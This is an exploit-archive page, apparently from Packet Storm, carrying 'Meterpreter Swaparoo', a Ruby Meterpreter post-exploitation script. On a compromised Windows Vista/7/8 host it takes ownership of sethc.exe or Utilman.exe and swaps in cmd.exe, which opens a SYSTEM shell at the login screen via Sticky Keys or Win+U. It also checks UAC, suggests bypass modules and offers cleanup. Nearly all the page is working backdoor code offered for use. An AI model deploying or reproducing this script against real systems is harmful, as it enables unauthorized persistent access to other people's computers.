exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Meterpreter Swaparoo Windows Backdoor Method

Meterpreter Swaparoo Windows Backdoor Method
Posted May 20, 2013
Authored by Un0wn_X

Swaparoo - Windows backdoor method for Windows Vista/7/8. This code sneaks a backdoor command shell in place of Sticky Keys prompt or Utilman assistant at login screen.

tags | shell
systems | windows
SHA-256 | a8cd0e00d51d3b5913e9d7c69e14520295b34ecc124cbe73c93f101a16b0bc53

Meterpreter Swaparoo Windows Backdoor Method

Change Mirror Download
# $Id:swaparoo.rb $ 
# $Revision: 01 $
# Meterpreter Swaparoo - Windows Backdoor Method (all Windows versions)
# Author: Un0wn_X
# Big Thanks to Hood3dRob1n with his massive support to this script
# E-mail: unownsec@gmail.com
# Follow @UnownSec
# website: http://unownsec.blogspot.com | http://kaoticcreations.blogspot.com/
# This was first pulished by Un0wn_X in Intern0t https://forum.intern0t.org/general-hacking-discussions/4637-backdoor-windows-8-7-vista.html
# PoC video: http://www.youtube.com/watch?v=fQna7LCw81Y
################## Variable Declarations ##################
session = client #Our victim session object we will work with
#Basic Arguments user can provide when running meterpreter script
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
"-u" => [ false, "Use Utilman.exe (Sethc.exe used by default)" ],
"-p" => [ false,"Path on target to find Sethc.exe or Utilman.exe (default is %SYSTEMROOT%\\\\system32\\\\)" ],
"-r" => [ false,"Remove payload & Return original back to its place (use with -u for Utilman.exe cleanup)" ]
)

################## Function Declarations ##################
#Usage
def usage
print_line("Windows Swaparoo - Sneaks a Backdoor Command Shell in place of Sticky Keys Prompt or Utilman assistant at Login Screen (requires admin privs)")
print_line(@@exec_opts.usage)
raise Rex::Script::Completed
end

#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

#check for proper privileges are in place to run the tasks (i.e. are we admin?)
def notadmin
print_error("You need admin privs to run this!")
print_error("Try using 'getsystem' or one of the many escalation scripts and try again.......")
raise Rex::Script::Completed
end

#Execute our list of command needed to achieve the backdooring (sethc.exe vs Utilman.exe) or cleanup tasks :p
def list_exec(session, cmdlst) #session is our meter sessions, cmdlst is our array of commands to run on target
r=''
session.response_timeout=120
cmdlst.each do |cmd|
begin
print_status("Executing: #{cmd}")
r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
break if d == ""
end
r.channel.close
r.close
rescue ::Exception => e
print_error("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
end

# check if UAC is enabled (the builtin for privs isn't workign for me for somereason so I made a new version), idk.....
def uac_enabled
#Confirm target could have UAC, then find out level its running at if possible
if session.sys.config.sysinfo['OS'] !~ /Windows Vista|Windows 2008|Windows [78]/
uac = false
else
begin
key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',KEY_READ)
if key.query_value('EnableLUA').data == 1
uac = true
print_status("UAC is Enabled, checking level...")
# key.close
uac_level = key.query_value('ConsentPromptBehaviorAdmin').data
if uac_level.to_i == 2
print_error("UAC is set to 'Always Notify'")
print_error("Things won't work under these conditions.....")
raise Rex::Script::Completed
elsif uac_level.to_i == 5
print_error("UAC is set to Default")
print_error("You should try running 'exploit/windows/local/bypassuac' to bypass UAC restrictions if you haven't already")
elsif uac_level.to_i == 0
print_good("UAC Settings Don't appear to be an issue...")
uac = false
else
print_status("Unknown UAC Setting, if it doesn't work try things manually to see if UAC is blocking......")
uac = false
end
end
key.close
rescue::Exception => e
print_error("Error Checking UAC: #{e.class} #{e}")
end
end
return uac
end

##################### MAIN ######################
# Parse our user provided options and run post script accordingly....
sysroot = session.fs.file.expand_path("%SYSTEMROOT%") #now we can get base path for different versions of Windows
path = "#{sysroot}\\\\system32\\\\" #twice is nice (must escape properly for dir dividers
targetexe = 0
helpcall = 0
remove = 0
@@exec_opts.parse(args) do |opt, idx, val|
case opt
when "-h"
helpcall = 1 #Help Menu
when "-u"
targetexe = 1 #0=> Sethc.exe, 1=>Utilman.exe
when "-p"
path = val #override default path
when "-r"
remove = 1 #Run cleanup
end
end

#Make sure we were passed proper arguments to run
if helpcall == 1
usage
end

#we only can do this on windows :p
unsupported if not session.platform =~ /win/i

#Make sure we are admin
if session.railgun.shell32.IsUserAnAdmin()['return']
print_good("Confirmed, currently running as admin.....")
else
notadmin
end

#Check if UAC is enabled and potentially going to cause us problems on newer systems
if uac_enabled
print_error("Can't run this on target system without bypassing UAC first!")
print_status("Please make sure you have already done this or script will not work......")
print_status("")
else
print_good("Confirmed, UAC is not an issue!")
end

#Arrays with our commands we need to accomplish stuff:
sethc = [ "takeown /f #{path}sethc.exe",
"icacls #{path}sethc.exe /grant administrators:f",
"rename #{path}sethc.exe sethc.exe.bak",
"copy #{path}cmd.exe #{path}cmd3.exe",
"rename #{path}cmd3.exe sethc.exe" ]

utilman = [ "takeown /f #{path}Utilman.exe",
"icacls #{path}Utilman.exe /grant administrators:f",
"rename #{path}Utilman.exe Utilman.exe.bak",
"copy #{path}cmd.exe #{path}cmd3.exe",
"rename #{path}cmd3.exe Utilman.exe" ]

sethc_cleanup = [ "takeown /f #{path}sethc.exe",
"icacls #{path}sethc.exe /grant administrators:f",
"takeown /f #{path}sethc.exe.bak",
"icacls #{path}sethc.exe.bak /grant Administrators:f",
"del #{path}sethc.exe",
"rename #{path}sethc.exe.bak sethc.exe" ]

utilman_cleanup = [ "takeown /f #{path}Utilman.exe",
"icacls #{path}Utilman.exe /grant administrators:f",
"takeown /f #{path}utilman.exe.bak",
"icacls #{path}utilman.exe.bak /grant Administrators:f",
"del #{path}Utilman.exe",
"rename #{path}Utilman.exe.bak Utilman.exe" ]

#Check if we running in cleanup mode or backdoor mode, act accordingly
if remove.to_i > 0
print_status("Starting the Swaparoo cleanup process.....")
#Check if using Utilman method or standard Sethc method
if targetexe.to_i > 0
list_exec(session, utilman_cleanup)
else
list_exec(session, sethc_cleanup)
end
else
#Check for signs of previous backdooring, if so this can overwrite the backup file which means you can't cleanup afterwards! Bail out if found as a result and have user remove, rename, or run cleanup to make it ok.....
print_status("Starting the Swaparoo backdooring process.....")
if targetexe.to_i > 0
if session.fs.file.exists?("#{path}utilman.exe.bak")
print_error("Target appears to have already been backdoored!")
print_error("Delete or rename the backup file (sethc.exe.bak or utilman.exe.bak) manually or run the -r option for running cleanup tasks.....")
raise Rex::Script::Completed
else
list_exec(session, utilman)
end
else
if session.fs.file.exists?("#{path}sethc.exe.bak")
print_error("Target appears to have already been backdoored!")
print_error("Delete or rename the backup file (sethc.exe.bak or utilman.exe.bak) manually or run the -r option for running cleanup tasks.....")
raise Rex::Script::Completed
else
list_exec(session, sethc)
end
end
end
# All done, peace out!
print_status("Finished Swaparoo!")
if remove.to_i > 0
print_good("System should be restored back to normal!")
else
if targetexe.to_i > 0
print_good("Press the Windows key + U or Click on the Blue Help icon at lower left on Login Screen and you should be greeted by a shell!")
else
print_good("Press Shift key 5 times at Login Screen and you should be greeted by a shell!")
end
end
#EOF
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close